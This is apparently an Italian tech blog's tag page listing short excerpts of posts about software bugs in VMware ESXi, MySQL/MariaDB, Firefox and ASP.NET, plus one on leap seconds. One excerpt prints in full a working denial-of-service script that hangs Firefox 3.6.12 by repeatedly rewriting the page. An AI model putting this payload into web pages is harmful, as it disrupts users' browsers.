Tag: baco

  • VMware, ma cosa combini?

    Negli ultimi mesi ESXi, il software su cui si basa tutta l’infrastruttura di VMware, ha avuto molti bachi critici non tanto di sicurezza, quanto di funzionalità di base. Per citarne alcuni:

  • Buco di sicurezza in MySQL/MariaDB

    È stato scoperto un pericoloso baco in MySQL/MariaDB che potrebbe permettere l’accesso come root ad un database server. La vulnerabilità non funziona su tutte le installazioni di MySQL (inclusa CentOS) e dipende da come è stato compilato il server. Il problema risiede nella routine di autenticazione di un utente. Quando viene aperta una connessione a MySQL/MariaDB viene…

  • 0day di Mozilla Firefox 3.6.12

    <!– 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele ‘emgent’ Gentili <emgent@backtrack-linux.org> Marco ‘white_sheep’ Rondini <white_sheep@backtrack-linux.org> Alessandro ‘scox’ Scoscia <scox@backtrack.it> –> <script>document.write(“\u0000\u0001\u0002\u0003\u0004\u0005”)</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write(“a”); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script> Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su…

  • Firefox: esposizione della password nell’URL

    In mancanza di altri programmi i browser possono essere utilizzate anche come client FTP. Per collegarsi, ad esempio, a mail.siamogeek.com con l’utente utente e la password segreta si può digitare questo URL: ftp://utente:segreta@mail.siamogeek.com Purtroppo Firefox registra questo URL nella cache, quindi se, dopo essersi collegati la prima volta a questo sito, si digita di nuovo…

  • ASP.NET: la cosa si fa seria (aggiornamento)

    [youtube=http://www.youtube.com/watch?v=yghiC_U2RaM&w=480] Contrariamente a quanto riportato da Microsoft, sembra che gli attacchi che sfruttano la vulnerabilità di ASP.NET siano non solo fattibili, come mostra il video qui sopra, ma anche in corso. La situazione sembra seria e chi amministra un sito esposto a Internet basato su ASP.NET dovrebbe al più presto prendere le contromisure consigliate da…

  • Il secondo intercalare

    31 Dicembre 2008 23:59:58 31 Dicembre 2008 23:59:59 31 Dicembre 2008 23:59:60 1 Gennaio 2009 00:00:00 1 Gennaio 2009 00:00:01 Errore? No, è esattamente quello che è successo quella notte a causa dell’introduzione del secondo intercalare (leap second in inglese).

  • Scoperto un problema di sicurezza di Firefox

    Treatpost segnala un problema di sicurezza che interessa tutte le versioni di Firefox scoperto da Armorize. Il browser non controlla gli indirizzi offuscati a cui si accede attraverso IFRAME, permettendo ad un attaccante di confondere o nascondere l’indirizzo del sito che si sta effettivamente visitando.